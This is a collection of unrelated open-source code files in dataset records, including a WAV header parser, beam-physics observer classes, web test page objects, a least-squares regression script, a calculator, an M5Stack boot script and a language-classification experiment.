'amplification', 'offset']\r\n        file_dict['filepath'] = filepath\r\n\r\n        # RIFF ID\r\n        file.seek(0, 0)\r\n        RIFFID_bytes = file.read(4).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n        file_dict['RIFFID'] = RIFFID_bytes\r\n        # RIFFID = ''.join([bin(ord(c)).replace('0b', '') for c in RIFFID_bytes])\r\n\r\n        # Size in bytes\r\n        file.seek(4, 0)\r\n        Size_In_Bytes = file.read(4)\r\n        SizeInBytes = int.from_bytes(Size_In_Bytes, byteorder='little', signed=False)\r\n        file_dict['SizeInBytes'] = SizeInBytes\r\n\r\n        # WAVE ID\r\n        file.seek(8, 0)\r\n        WAVE_ID_bytes = file.read(4).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n        # WAVE_ID = ''.join([bin(ord(c)).replace('0b', '') for c in WAVE_ID_bytes])\r\n        file_dict['WAVE_ID'] = WAVE_ID_bytes\r\n\r\n        # Format chunk ID\r\n        file.seek(12, 0)\r\n        Format_chunk_ID_bytes = file.read(4).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n        # Format_chunk_ID = ''.join([bin(ord(c)).replace('0b', '') for c in Format_chunk_ID_bytes])\r\n        file_dict['Format_chunk_ID'] = Format_chunk_ID_bytes\r\n\r\n        # Format tag\r\n        file.seek(20, 0)\r\n        Format_tag_bytes = file.read(2).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n        file_dict['Format_tag'] = Format_tag_bytes\r\n\r\n        # 通道数\r\n        file.seek(22, 0) # 表示从0开始,offset 22的位置开始读取数据\r\n        Channels_number_bytes = file.read(2) ##表示读取多少个字节\r\n        Channels_number = int.from_bytes(Channels_number_bytes, byteorder='little', signed=False) ##将二进制转换成数字\r\n        print('Channels_number: ', Channels_number)\r\n        file_dict['Channels_number'] = Channels_number\r\n\r\n        # Samples per second\r\n        file.seek(24, 0) # 表示从0开始,offset 22的位置开始读取数据\r\n        Samples_per_second_bytes = file.read(4) ##表示读取多少个字节\r\n        Samples_per_second = int.from_bytes(Samples_per_second_bytes, byteorder='little', signed=False) ##将二进制转换成数字\r\n        file_dict['Samples_per_second'] = Samples_per_second\r\n\r\n        # Block alignment\r\n        file.seek(32, 0) # 表示从0开始,offset 22的位置开始读取数据\r\n        Block_alignment_bytes = file.read(2) ##表示读取多少个字节\r\n        Block_alignment = int.from_bytes(Block_alignment_bytes, byteorder='little', signed=False) ##将二进制转换成数字\r\n        file_dict['Block_alignment'] = Block_alignment\r\n\r\n        # CMS chunk ID\r\n        file.seek(36, 0) # 表示从0开始,offset 22的位置开始读取数据\r\n        CMS_chunk_ID_bytes = file.read(4).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode()) ##表示读取多少个字节\r\n        # CMS_chunk_ID = ''.join([bin(ord(c)).replace('0b', '') for c in CMS_chunk_ID_bytes])\r\n        file_dict['CMS_chunk_ID'] = CMS_chunk_ID_bytes\r\n\r\n        # Device name\r\n        file.seek(44, 0) # 表示从0开始,offset 22的位置开始读取数据\r\n        Device_name_bytes = file.read(256).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode()) ##表示读取多少个字节\r\n        # Device_name = bytes([int(x,2) for x in Device_name_bytes]).decode('utf-8')\r\n        file_dict['Device_name'] = Device_name_bytes\r\n\r\n        # 起始时间\r\n        file.seek(300, 0)\r\n        # pos=file.tell()\r\n        Time_stamp_bytes = file.read(4)\r\n        Time_stamp = int.from_bytes(Time_stamp_bytes, byteorder='little', signed=True)\r\n        Time_array = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(Time_stamp))\r\n        file_dict['Time_stamp'] = str(Time_stamp)\r\n\r\n        if Channels_number >= 1:\r\n            # Channel name 1\r\n            file.seek(308, 0)\r\n            Channel1_name = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n            # Unit name 1\r\n            file.seek(372, 0)\r\n            Channel1_unit = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n            # Amplification系数 1\r\n            file.seek(436, 0)\r\n            Channel1_amplification_bytes = file.read(4)\r\n            Channel1_amplification = struct.unpack('<f', Channel1_amplification_bytes)[0]\r\n\r\n        if Channels_number >= 2:\r\n            # 
Channel name 2\r\n            file.seek(444, 0)\r\n            Channel2_name = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n            # Unit name 2\r\n            file.seek(508, 0)\r\n            Channel2_unit = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n            # Amplification系数 2\r\n            file.seek(572, 0)\r\n            Channel2_amplification_bytes = file.read(4)\r\n            Channel2_amplification = struct.unpack('<f', Channel2_amplification_bytes)[0]\r\n\r\n        if Channels_number >= 3:\r\n            # Channel name 3\r\n            file.seek(580, 0)\r\n            Channel3_name = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n            # Unit name 3\r\n            file.seek(644, 0)\r\n            Channel3_unit = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n            # Amplification系数 3\r\n            file.seek(708, 0)\r\n            Channel3_amplification_bytes = file.read(4)\r\n            Channel3_amplification = struct.unpack('<f', Channel3_amplification_bytes)[0]\r\n\r\n        if Channels_number >= 4:\r\n            # Channel name 4\r\n            file.seek(716, 0)\r\n            Channel4_name = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n            # Unit name 4\r\n            file.seek(780, 0)\r\n            Channel4_unit = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n            # Amplification系数 4\r\n            file.seek(844, 0)\r\n            Channel4_amplification_bytes = file.read(4)\r\n            Channel4_amplification = struct.unpack('<f', Channel4_amplification_bytes)[0]\n\n    def to_df(self) -> _pd.DataFrame:\n        return _pd.DataFrame(self.data, columns=self.headers).set_index(\"NAME\")\n\n\nclass BeamObserver(Observer):\n    \"\"\"\n\n    Return the beam distribution at the exit of an element. Optionnaly, return the beam at the entrance of the element.\n\n    \"\"\"\n\n    def __init__(self, elements: Optional[List[str]] = None, with_input_beams: bool = False):\n        super().__init__(elements)\n        self._with_input_beams = with_input_beams\n        self.headers = (\n            \"NAME\",\n            \"AT_ENTRY\",\n            \"AT_CENTER\",\n            \"AT_EXIT\",\n            \"BEAM_IN\",\n            \"BEAM_OUT\",\n        )\n\n    def __call__(self, element, b1, b2):\n        if super().__call__(element, b1, b2):\n            self.data.append(\n                (\n                    element.NAME,\n                    element.AT_ENTRY,\n                    element.AT_CENTER,\n                    element.AT_EXIT,\n                    _np.copy(b1) if self._with_input_beams else None,\n                    _np.copy(b2),\n                ),\n            )\n\n\nclass SuperObserver(Observer):\n    def __init__(self, elements: Optional[List[str]] = None):\n        super().__init__(elements)\n        self.headers = (\n            \"NAME\",\n            \"AT_ENTRY\",\n            \"AT_CENTER\",\n            \"AT_EXIT\",\n        )\n\n    def __call__(self, element, b1, b2):\n        if super().__call__(element, b1, b2):\n            self.data.append((element.NAME, element.AT_ENTRY, element.AT_CENTER, element.AT_EXIT))\n\n\nclass MeanObserver(Observer):\n    \"\"\"\n\n    Compute the mean values of the beam coordinates.\n\n    \"\"\"\n\n    def __init__(self, elements: Optional[List[str]] = None):\n        super().__init__(elements)\n        self.headers = (\n            \"NAME\",\n            \"AT_ENTRY\",\n            \"AT_CENTER\",\n            \"AT_EXIT\",\n            \"BEAM_IN_X\",\n            \"BEAM_OUT_X\",\n            \"BEAM_IN_Y\",\n            \"BEAM_OUT_Y\",\n            \"BEAM_IN_XP\",\n            \"BEAM_OUT_XP\",\n            \"BEAM_IN_YP\",\n            \"BEAM_OUT_YP\",\n            \"BEAM_IN_DPP\",\n            \"BEAM_OUT_DPP\",\n        )\n\n    def __call__(self, element, b1, b2):\n        if super().__call__(element, b1, b2):\n            self.data.append(\n                (\n                    element.NAME,\n                    element.AT_ENTRY,\n                    element.AT_CENTER,\n                    element.AT_EXIT,\n                    b1[:, 0].mean(),\n                    b2[:, 0].mean(),\n                    b1[:, 2].mean(),\n                    b2[:, 2].mean(),\n                    b1[:, 1].mean(),\n                    b2[:, 1].mean(),\n                    b1[:, 3].mean(),\n                    b2[:, 3].mean(),\n                    b1[:, 4].mean(),\n                    b2[:, 4].mean(),\n                ),\n            )\n\n\nclass SigmaObserver(Observer):\n    \"\"\"\n\n    Compute the standard deviation of the beam coordinates.\n\n    \"\"\"\n\n    def __init__(self, elements: Optional[List[str]] = None):\n        super().__init__(elements)\n        self.headers = (\n            \"NAME\",\n            \"AT_ENTRY\",\n            \"AT_CENTER\",\n            
\"AT_EXIT\",\n \"BEAM_IN_X\",\n \"BEAM_OUT_X\",\n \"BEAM_IN_Y\",\n \"BEAM_OUT_Y\",\n \"BEAM_IN_XP\",\n \"BEAM_OUT_XP\",\n \"BEAM_IN_YP\",\n \"BEAM_OUT_YP\",\n \"BEAM_IN_DPP\",\n \"BEAM_OUT_DPP\",\n )\n\n def __call__(self, element, b1, b2):\n if super().__call__(element, b1, b2):\n self.data.append(\n (\n element.NAME,\n element.AT_ENTRY,\n element.AT_CENTER,\n element.AT_EXIT,\n b1[:, 0].std(),\n b2[:, 0].std(),\n b1[:, 2].std(),\n b2[:, 2].std(),\n b1[:, 1].std(),\n b2[:, 1].std(),\n b1[:, 3].std(),\n b2[:, 3].std(),\n b1[:, 4].std(),\n b2[:, 4].std(),\n ),\n )\n\n\nclass LossesObserver(Observer):\n \"\"\"\n\n Compute the losses and the transmission in an element.\n\n \"\"\"\n\n def __init__(self, elements: Optional[List[str]] = None):\n super().__init__(elements)\n self.headers = (\n \"NAME\",\n \"AT_ENTRY\",\n \"AT_CENTER\",\n \"AT_EXIT\",\n \"PARTICLES_IN\",\n \"PARTICLES_OUT\",\n \"TRANSMISSION\",\n \"LOSSES\",\n )\n\n def __call__(self, element, b1, b2):\n if super().__call__(element, b1, b2):\n self.data.append(\n (\n element.NAME,\n element.AT_ENTRY,\n element.AT_CENTER,\n element.AT_EXIT,\n b1.shape[0],\n b2.shape[0],\n 100 * (b2.shape[0] / b1.shape[0]),\n 100 * (1 - b2.shape[0] / b1.shape[0]),\n ),\n )\n\n def compute_global_transmission(self, global_transmission: float = 1.0):\n for elem in self.data:\n global_transmission *= elem[3] / 100\n return global_transmission * 100\n\n def compute_global_losses(self):\n return 100 - self.compute_global_transmission()\n\n # def adjust_for_efficiency(self, efficiency: float = 1.0):\n # do something with self.data\n # self.data['LOSSES'] /= efficiency\n # self.data['TRANSMISSION'] *= effiency\n # ...\n\n\nclass SymmetryObserver(Observer):\n \"\"\"\n\n Compute the symmetry of the beam.\n\n \"\"\"\n\n def __init__(self, elements: Optional[List[str]] = None):\n super().__init__(elements=elements)\n\n self.headers = (\n \"NAME\",\n \"AT_ENTRY\",\n \"AT_CENTER\",\n \"AT_EXIT\",\n \"SYM_IN\",\n \"SYM_OUT\",\n )\n\n def __call__(self, element, b1, b2):\n self.data.append(\n (\n element.NAME,\n element.AT_ENTRY,\n element.AT_CENTER,\n element.AT_EXIT,\n abs(b1[:, 0].std() - b1[:, 2].std()) / (b1[:, 0].std() + b1[:, 2].std()),\n abs(b2[:, 0].std() - b2[:, 2].std()) / (b2[:, 0].std() + b2[:, 2].std()),\n ),\n )\n\n\nclass TwissObserver(Observer):\n\n \"\"\"\n\n Compute the Twiss parameters of the beam.\n\n \"\"\"\n\n def __init__(self, elements=None):\n super().__init__(elements)\n self.headers = (\n \"NAME\",\n \"AT_ENTRY\",\n \"AT_CENTER\",\n \"AT_EXIT\",\n \"EMIT_IN_X\",\n \"EMIT_OUT_X\",\n \"BETA_IN_X\",\n \"BETA_OUT_X\",\n \"ALPHA_IN_X\",\n \"ALPHA_OUT_X\",\n \"DISP_IN_X\",\n \"DISP_OUT_X\",\n \"DISP_IN_XP\",\n \"DISP_OUT_XP\",\n \"EMIT_IN_Y\",\n \"EMIT_OUT_Y\",\n \"BETA_IN_Y\",\n \"BETA_OUT_Y\",\n \"ALPHA_IN_Y\",\n \"ALPHA_OUT_Y\",\n \"DISP_IN_Y\",\n \"DISP_OUT_Y\",\n \"DISP_IN_YP\",\n \"DISP_OUT_YP\",\n )\n\n def __call__(self, element, b1, b2):\n if super().__call__(element, b1, b2):\n # Do not use distribution but directly use numpy with numba\n twiss_in = Distribution.compute_twiss(b1)\n twiss_out = Distribution.compute_twiss(b2)\n\n self.data.append(\n (\n element.NAME,\n element.AT_ENTRY,\n element.AT_CENTER,\n element.AT_EXIT,\n twiss_in[0],\n twiss_out[0],\n twiss_in[1],\n twiss_out[1],\n twiss_in[2],\n twiss_out[2],\n twiss_in[3],\n twiss_out[3],\n twiss_in[4],\n twiss_out[4],\n twiss_in[5],\n twiss_out[5],\n twiss_in[6],\n twiss_out[6],\n twiss_in[7],\n twiss_out[7],\n twiss_in[8],\n twiss_out[8],\n twiss_in[9],\n twiss_out[9],\n 
),\n )\n\n\nclass IbaBpmObserver(Observer):\n def __init__(self, elements: Optional[List[str]] = None):\n super().__init__(elements)\n self.headers = (\n \"NAME\",\n \"AT_ENTRY\",\n \"AT_CENTER\",\n \"AT_EXIT\",\n \"BEAM_OUT_X\",\n \"BEAM_OUT_Y\",\n )\n\n @staticmethod\n def fit_bpm(distribution: _np.array):\n @njit\n def gaussian(x, a, mu, sigma):\n return a * _np.exp(-((x - mu) ** 2) / (2 * sigma**2)) / (_np.sqrt(2 * _np.pi) * sigma)\n\n def fit_bpm(d, maxfev=1e7):\n bs = (\n _np.array(\n [\n -31,\n -19.8,\n -15.8,\n -11.8,\n -7.8,\n -5.8,\n -3.8,\n -1.8,\n 0.0,\n 1.8,\n 3.8,\n 5.8,\n 7.8,\n 11.8,\n 15.8,\n 19.8,\n 31,\n ],\n )\n / 1000\n )\n bsp = (bs[1:] + bs[:-1]) / 2\n w = 1.0 / (bs[1:] - bs[:-1])\n w[0] *= 0.7\n w[-1] *= 0.7\n hist = _np.histogram(d, bs)\n x = bsp\n y = w * hist[0]\n ar = _np.trapz(y / _np.sum(y) * len(y), x)\n mean = _np.mean(x * y / _np.sum(y) * len(y))\n rms = _np.std(x * y / _np.sum(y) * len(y))\n\n params = Parameters() # Instanciate the Parameters class, then add variables as keywords\n params.add(\"a\", value=ar, min=-1e6, max=1e6)\n params.add(\"mu\", value=mean, min=mean - _np.abs(mean), max=mean + _np.abs(mean))\n params.add(\"sigma\", value=rms, min=0.5 * rms, max=2 * rms)\n params.add(\"max_nfev\", value=maxfev)\n\n gmodel = Model(gaussian)\n result = gmodel.fit(\n data=y,\n x=x,\n params=params,\n )\n\n # Print the fit result\n print(\"bpm fit result:\", result.best_values[\"a\"], result.best_values[\"mu\"], result.best_values[\"sigma\"])\n return [result.best_values[\"sigma\"]]\n\n return fit_bpm(distribution)\n\n def __call__(self, element, b1, b2):\n if super().__call__(element, b1, b2) and element.CLASS == \"Marker\":\n print(element.NAME) # To identify the BPM whose data are being fitted\n self.data.append(\n (\n element.NAME,\n element.AT_ENTRY,\n element.AT_CENTER,\n element.AT_EXIT,\n self.fit_bpm(b2[:, 0])[0],\n self.fit_bpm(b2[:, 2])[0],\n ),\n )\n","repo_name":"ULB-Metronu/georges","sub_path":"georges/manzoni/observers.py","file_name":"observers.py","file_ext":"py","file_size_in_byte":11774,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"29489320203","text":"from common.front_end_test_case import FrontEndTestCase\nfrom businessCommon.pages.login_page import EtownLoginPage, MyPage\nfrom businessCommon.pages.create_account_page import CreateAccountPage\n\n\nclass MyPageOpenedCheck(FrontEndTestCase):\n\n def runTest(self):\n username = CreateAccountPage(self.driver).activate_account()\n EtownLoginPage(self.driver).log_in(username)\n MyPage(self.driver).mypage_check()\n\nif __name__ == '__main__':\n MyPageOpenedCheck().runTest()","repo_name":"hongbaby/webAutomation","sub_path":"cases/Etown_Smoke_test_cases/my_page_opened_check.py","file_name":"my_page_opened_check.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34624021927","text":"from src.pages.distributor.distributor_portal_page import DistributorPortalPage\nfrom src.pages.locator import Locator as L\nfrom src.resources.tools import Tools\n\nclass VmiPage(DistributorPortalPage):\n location_body = {\n \"sku\": None,\n \"orderingConfig.currentInventoryControls.min\": None,\n \"orderingConfig.currentInventoryControls.max\": None,\n \"attributeName1\": None,\n \"attributeValue1\": None,\n \"customerSku\": None,\n \"type\": None\n }\n xpath_button_bulk_operations = f\"{L.button_type}//span[text()='Bulk operations']\"\n\n def 
follow_location_url(self, customer_id=None, shipto_id=None):\n if customer_id is None:\n customer_id = self.data.customer_id\n if shipto_id is None:\n shipto_id = self.data.shipto_id\n self.follow_url(f\"{self.url.distributor_portal}/customers/{customer_id}/shiptos/{shipto_id}#vmi-list\")\n\n def create_location(self, location_body):\n self.element(L.add_button).click()\n self.select_in_dropdown_via_input(L.get_dropdown_in_dialog(1), location_body.pop(\"sku\"), span=True)\n for field in location_body.keys():\n self.input_by_name(field, location_body[field])\n self.element(L.submit_button).click()\n self.dialog_should_not_be_visible()\n\n def check_last_location(self, location_body):\n self.open_last_page()\n table_cells = {\n \"Distributor SKU\": location_body[\"sku\"],\n }\n for cell, value in table_cells.items():\n self.check_last_table_item_outdated(cell, value)\n\n def import_location(self, locations):\n Tools.generate_csv(\"locations.csv\", locations)\n self.element(L.item_action_import).click()\n self.import_csv(L.file_upload, \"locations.csv\")\n self.element(L.successfully_imported_msg).get()\n","repo_name":"fisher1706/ilx","sub_path":"src/pages/distributor/vmi_page.py","file_name":"vmi_page.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5583397870","text":"#!/usr/bin/python\n# -*- encoding:utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# 机器学习算法:线性回归--最小二乘法\ndef least_squares(data):\n # 1. 导入数据(data.csv), 返回一个二维数组\n points = np.genfromtxt(data, delimiter=',')\n # 提取points中的两列数据,分别作为x, y\n # print(points)\n # 取出所有的x\n xn = points[:, 0]\n # 取出所有的y\n yn = points[:, 1]\n # 绘制x, y的散点图\n plt.scatter(xn, yn)\n plt.show()\n # 通过拟合函数计算损失函数系数\n w, b = fit(points)\n print(\"w = \", w)\n print(\"b = \", b)\n print(\"cost = \", compute_cost(w, b, points))\n # 画出拟合曲线,plot是点图\n plt.scatter(xn, yn)\n # 针对每一个x计算出预测的y值\n pred_y = w * xn + b\n plt.plot(xn, pred_y, c='red')\n plt.show()\n\n\ndef compute_cost(w, b, points):\n \"\"\"\n 损失函数:损失函数是系数的函数, 公式:(y - wx -b) ** 2 再对每个点的损失求和\n :param w: x的系数\n :param b: 常量\n :param points: 数据源\n :return:\n \"\"\"\n # 每个点的损失和\n total_cost = 0\n # 点的总数\n m = len(points)\n # 逐点计算平方损失误差,然后求平均数\n for i in range(m):\n x = points[i, 0]\n y = points[i, 1]\n total_cost += (y - w * x - b) ** 2\n\n return total_cost/m\n\n\ndef average(data):\n \"\"\"\n 求平均值\n :param data: 数据\n :return: 平均值\n \"\"\"\n sum_data = 0\n m = len(data)\n for i in range(m):\n sum_data += data[i]\n\n return sum_data/m\n\n\ndef fit(points):\n \"\"\"\n 核心拟合函数,官方定义的方法名都是fit\n 通过拟合函数计算出损失函数系数\n :param points: 数据\n :return: w, b\n \"\"\"\n # 求和总次数\n m = len(points)\n # x的平均值\n x_avg = average(points[:, 0])\n # 计算w, b\n sum_yx = 0\n sum_xx = 0\n for i in range(m):\n x = points[i, 0]\n y = points[i, 1]\n # 对 y * (x - x_avg)求和\n sum_yx += y * (x - x_avg)\n # 对 x的平方求和\n sum_xx += x ** 2\n\n # 计算w的值\n w = sum_yx / (sum_xx - m * (x_avg ** 2))\n # 计算b的值\n sum_ywx = 0\n for i in range(m):\n x = points[i, 0]\n y = points[i, 1]\n sum_ywx += y - w * x\n\n b = sum_ywx / m\n return w, b\n\n\nif __name__ == '__main__':\n least_squares('D:/Learn/Workspace/Python/machine-learning/src/data/data.csv')\n","repo_name":"xiaoqiangjava/machine-learning","sub_path":"src/linear-regression/least-squares.py","file_name":"least-squares.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} 
+{"seq_id":"4325965376","text":"menu_variants = ('1', '2', '3', '4', '5')\nhistory = []\nprint('Skaičiuotuvas\\n')\nwhile True:\n print('1. Sudėtis \\n'\n '2. Atimtis \\n'\n '3. Daugyba \\n'\n '4. Dalyba \\n'\n '5. Atspausdinti skaičių seką nuo x iki y \\n'\n 'Baigti darbą - q')\n print('*' * 30)\n selection = input('>>>> ')\n\n if selection == 'q':\n print('Atliktų veiksmų istorija: \\n')\n for el in history:\n if type(el) == list:\n print(*el)\n else:\n print(el)\n break\n\n if not selection in menu_variants:\n print('Tokio pasirinkimo nėra..')\n print('*' * 30)\n continue\n\n x = float(input('Įveskite pirmą skaičių: '))\n y = float(input('Įveskite antrą skaičių: '))\n x_int_check = int(x) if x.is_integer() else x\n y_int_check = int(y) if y.is_integer() else y\n\n if selection == '1':\n res = x + y\n res_int_check = int(res) if res.is_integer() else res\n res_string = f'{x_int_check} + {y_int_check} = {res_int_check}'\n print(res_string)\n history.append(res_string)\n print('*' * 30)\n\n elif selection == '2':\n res = x - y\n res_int_check = int(res) if res.is_integer() else res\n res_string = f'{x_int_check} - {y_int_check} = {res_int_check}'\n print(res_string)\n history.append(res_string)\n print('*' * 30)\n\n elif selection == '3':\n res = x * y\n res_int_check = int(res) if res.is_integer() else res\n res_string = f'{x_int_check} * {y_int_check} = {res_int_check}'\n print(res_string)\n history.append(res_string)\n print('*' * 30)\n\n elif selection == '4':\n res = x / y\n res_int_check = int(res) if res.is_integer() else res\n res_string = f'{x_int_check} / {y_int_check} = {res_int_check}'\n print(res_string)\n history.append(res_string)\n print('*' * 30)\n\n elif selection == '5':\n range_l = []\n x = int(x)\n y = int(y)\n if x > y:\n\n for sk in range(x, y - 1, -1):\n range_l.append(sk)\n print(sk, end=' ')\n history.append(range_l)\n print('\\n', '*' * 30)\n\n else:\n for sk in range(x, y + 1):\n range_l.append(sk)\n print(sk, end=' ')\n history.append(range_l)\n print('\\n', '*' * 30)\n","repo_name":"TomasKrin/PTU18git","sub_path":"kalkuliatorius.py","file_name":"kalkuliatorius.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"lt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31757157117","text":"import machine,os,ujson,sys,time\n\n\nprint('Booting..')\n\nsys.path.append('/flash/libs')\nsys.path.append('flowlib/lib')\n\nfrom m5stack import *\nimport menu as mnu\nimport helper as hp\nimport custbutton as btn\nconfig = {}\nwith open('config.cfg','r') as configFile:\n config = ujson.load(configFile)\n\nbuttonA = machine.Pin(37, machine.Pin.IN)\nbuttonB = machine.Pin(39, machine.Pin.IN)\n\nM5Led.on()\ntime.sleep(2)\nM5Led.off()\n\n\ndef configWiFi():\n\tlcd.clear(lcd.BLACK)\n\tlcd.text(lcd.CENTER,30,'192.168.4.1')\n\timport wifiConfig\n\twifiConfig.setupWifi()\n\t\n\treturn 1\ndef configUSB():\n\tlcd.clear(lcd.BLACK)\n\tlcd.text(lcd.CENTER,lcd.CENTER,'Enter config using serial\\nport.\\nhp.setPara(key,value)')\n\treturn 1\n\ndef configKeyCard():\n\tpass\n\ndef debugMenu():\n\treturn 1\n\n\nif buttonA.value() == 0:\n import main_menu\nelif buttonB.value()==0:\n\tsettingMenu = mnu.Menu(hp.tft,btn,header='Settings',landscape=True)\n\tsettingMenu.addMenuItem('Setup WiFi',configWiFi)\n\tsettingMenu.addMenuItem('Configure Using USB',configUSB)\n\tsettingMenu.addMenuItem('Configure Using Key Card',configKeyCard)\n\tsettingMenu.addMenuItem('Debug Menu',debugMenu)\n\tsettingMenu.run()\nelse:\n 
os.chdir('apps/'+config['apps']['defaultApp'])\n import main","repo_name":"neoxharsh/M5Stack-Application-Platform-Micropython","sub_path":"boot.py","file_name":"boot.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"629558431","text":"from HTMLextractor_helper import corpus_reader\nfrom feature_extraction_helper import load_dataset, get_feature_dict\nfrom zipfile import ZipFile\nfrom tqdm import tqdm\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.tree import DecisionTreeClassifier\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import randint\nfrom sklearn.tree import export_graphviz\nimport re\nfrom nltk.corpus import stopwords, brown, words, webtext\nimport string\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import tree\n\nZIP_FILEPATH = \"lang-8.zip\"\nTRAIN_FILEPATH = \"train.txt\"\nDEV_FILEPATH = \"dev.txt\"\nTEST_FILEPATH = \"test.txt\"\n\nASIAN_LANG = [\"Korean\", \"Japanese\", \"Mandarin\"]\n\n\ndef split_dataset_and_extract_features(train_data, dev_data, test_data, filepath):\n \"\"\"Split the dataset from the given filepath and extract featrues for trainining data, development data and test data\n\n Args:\n train_set (list): List of filenames in training set\n dev_set (list): List of filenames in dev set\n test_set (list): List of filenames in test set\n filepath (str): a path to the zip file\n\n Returns:\n Tuple of list: A tuple of list of feature dicts which extracted from zip file for each set\n \"\"\"\n X_train, y_train = [], []\n X_dev, y_dev = [], []\n X_test, y_test = [], []\n\n my_zip = ZipFile(filepath)\n corpus_generator = corpus_reader(my_zip)\n ALL_TEXT = \"\"\n for doc, native_lang, body_text in tqdm(corpus_generator):\n if native_lang == \"Russian\":\n continue\n feature_dict = get_feature_dict(body_text)\n\n if doc in train_set:\n X_train.append(feature_dict)\n if native_lang in ASIAN_LANG:\n y_train.append(\"Asian\")\n else:\n y_train.append(\"European\")\n\n if doc in dev_set:\n X_dev.append(feature_dict)\n if native_lang in ASIAN_LANG:\n y_dev.append(\"Asian\")\n else:\n y_dev.append(\"European\")\n\n if doc in test_set:\n X_test.append(feature_dict)\n if native_lang in ASIAN_LANG:\n y_test.append(\"Asian\")\n else:\n y_test.append(\"European\")\n\n my_zip.close()\n return X_train, y_train, X_dev, y_dev, X_test, y_test\n\n\ndef feature_ablation(model, feature_lst, X_train, y_train, X_dev, y_dev):\n \"\"\"Feature selection algorithm from given features\n\n Args:\n model (sklearn model): A sklearn model used to evaluate feature selection\n feature_lst (list): A list of d feature names\n X_train (numpy array): X_train with shape n * d\n y_train (numpy array): y_train with shape n * 1\n X_dev (numpy array): X_dev with shape m * d\n y_dev (numpy array): y_dev with shape m * 1\n \"\"\"\n features = feature_lst[:]\n model.fit(X_train, y_train)\n best_score = model.score(X_dev, y_dev)\n print(f\"--- The preliminary score is {best_score} ---\")\n\n for i in range(len(features)):\n current_best_score = 0\n remove_feature = None\n remove_idx = None\n\n # try deleting each feature at a time and compare the validation score\n for idx, feature in enumerate(features):\n X_train_enc_ablation = np.delete(X_train, idx, 1)\n X_dev_enc_ablation = np.delete(X_dev, idx, 1)\n\n model.fit(X_train_enc_ablation, y_train)\n score = model.score(X_dev_enc_ablation, y_dev)\n 
print(f\"Try removing feature: {feature}...\")\n print(f\" ....reaching validation score: {score}\")\n # track the best validation score when removing a feature\n if score > current_best_score:\n current_best_score = score\n remove_feature = feature\n remove_idx = idx\n\n # if removing any of the feature results in lower score, we should stop\n # because all of them are useful\n if current_best_score < best_score:\n break\n best_score = current_best_score\n print(\"***************************************\")\n print(f\"Removed feature: {remove_feature}\")\n print(f\"The best score so far is {best_score}\")\n print(\"***************************************\")\n\n X_train = np.delete(X_train, remove_idx, 1)\n X_dev = np.delete(X_dev, remove_idx, 1)\n features.pop(remove_idx)\n print(\"--- Stop removing features ---\")\n print(f\"The best score we can reach after feature ablation is {best_score}\")\n return features\n\n\ntrain_set = load_dataset(TRAIN_FILEPATH)\ndev_set = load_dataset(DEV_FILEPATH)\ntest_set = load_dataset(TEST_FILEPATH)\n\n# transform the feature_dict to numpy array\nX_train, y_train, X_dev, y_dev, X_test, y_test = split_dataset_and_extract_features(\n train_set, dev_set, test_set, ZIP_FILEPATH\n)\nvectorizer = DictVectorizer()\nX_train_enc = vectorizer.fit_transform(X_train).toarray()\nX_dev_enc = vectorizer.fit_transform(X_dev).toarray()\nX_test_enc = vectorizer.fit_transform(X_test).toarray()\n\nfeatures = [k for k, v in sorted(vectorizer.vocabulary_.items(), key=lambda x: x[1])]\n\n# init a decision tree model and calculate the preliminary score\nmodel_dt = DecisionTreeClassifier(max_depth=3, random_state=123)\nmodel_dt.fit(X_train_enc, y_train)\nprint(f\"The preliminary score is {model_dt.score(X_dev_enc, y_dev)}.\")\n\n# feature ablation\nfeature_ablation(model_dt, features, X_train_enc, y_train, X_dev_enc, y_dev)\n\nv = vectorizer.vocabulary_\nselected_feature_idx = [\n v[\"avg_word_length\"],\n v[\"if_mention_european\"],\n v[\"stopwords_counts\"],\n v[\"tag_X_count\"],\n v[\"web_words_count\"],\n]\nprint(f\"The mapping between the feature and index in DictVectorizer:{v}\")\nprint(f\"Selected index of features are {selected_feature_idx}\")\n\nX_train_new = X_train_enc[:, selected_feature_idx]\nX_test_new = X_test_enc[:, selected_feature_idx]\n\n# train decision tree with reduced feature set\nmodel_dt.fit(X_train_new, y_train)\nmodel_dt.score(X_test_new, y_test)\n\n# report\nmodel_dt_reduced = DecisionTreeClassifier(max_depth=3, 